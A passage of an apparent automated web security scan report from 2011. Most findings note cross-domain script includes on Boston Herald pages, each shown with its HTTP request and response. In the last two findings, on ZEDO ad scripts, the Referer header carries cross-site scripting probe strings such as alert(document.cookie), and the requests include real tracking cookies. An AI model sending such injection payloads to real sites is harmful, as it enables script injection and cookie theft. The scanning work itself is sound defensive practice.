Connection: close
Content-Length: 41502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.118. http://bostonherald.com/news/regional/view/20110128crane_elevator_malfunction_keeps_worker_hanging/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /news/regional/view/20110128crane_elevator_malfunction_keeps_worker_hanging/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/regional/view/20110128crane_elevator_malfunction_keeps_worker_hanging/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 42189

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.119. http://bostonherald.com/projects/your_tax_dollars.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /projects/your_tax_dollars.bg

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /projects/your_tax_dollars.bg?src=Mefa HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 28342

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<!-- Google hosts a compressed, cacheable version of Prototype -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.120. http://bostonherald.com/search/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /search/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /search/?topic=Annette+Bening&position=0 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 64237

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<!-- Google hosts a compressed, cacheable version of Prototype -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.121. http://bostonherald.com/sports/football/patriots/view.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /sports/football/patriots/view.bg

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sports/football/patriots/view.bg?articleid=1312526 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 49857

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.122. http://bostonherald.com/track/inside_track/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /track/inside_track/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /track/inside_track/?position=1 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 56718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.123. http://bostonherald.com/track/inside_track/view.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /track/inside_track/view.bg

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /track/inside_track/view.bg?articleid=1312550&position=0 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 48945

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.124. http://bostonherald.com/track/star_tracks/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /track/star_tracks/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /track/star_tracks/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 52345

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.125. http://bostonherald.com/track/star_tracks/view.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /track/star_tracks/view.bg

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /track/star_tracks/view.bg?articleid=1312549&srvc=track&position=3 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 38996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.126. http://bostonherald.com/users/login

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /users/login

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /users/login HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 05:21:14 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 30741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<!-- Google hosts a compressed, cacheable version of Prototype -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.127. http://bostonherald.com/users/register/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /users/register/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /users/register/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 05:21:14 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 37175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<!-- Google hosts a compressed, cacheable version of Prototype -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.128. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-401/c5/jsc/fm.js?c=167&a=0&f=&n=1220&r=13&d=14&q=&$=&s=126&l=http%3A//hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/&z=0.9975781855173409 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFad=0; FFcat=1220,101,9

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,167,14:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=242
Expires: Fri, 28 Jan 2011 14:52:34 GMT
Date: Fri, 28 Jan 2011 14:48:32 GMT
Connection: close
Content-Length: 1875

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=126;var zzPat='';var zzC
...[SNIP]...
f zzIdxClk == 'undefined' || zzIdxClk.length == 0) { var zzIdxClk =''; }
else { zzIdxClk = 'se=' + zzIdxClk;}
if (typeof ainfo == 'undefined' || ainfo.length == 0) { var ainfo =''; }


document.write('<script language="JavaScript" src="http://smm.sitescout.com/tag.jsp?pid=52AF2E4&w=728&h=90&rnd=%r&cm=http://xads.zedo.com/ads2/c?a=882519;x=3584;g=172;c=1220000167,1220000167;i=0;n=1220;1=8;2=1;s=126;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=1075159;h=922865;k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/"><\/script>
...[SNIP]...

18.129. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fmr.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-401/c5/jsc/fmr.js?c=101&a=0&f=&n=1220&r=13&d=9&q=&$=&s=69&l=http%3A//hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/&z=0.11480318708345294 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=84
Expires: Fri, 28 Jan 2011 14:15:59 GMT
Date: Fri, 28 Jan 2011 14:14:35 GMT
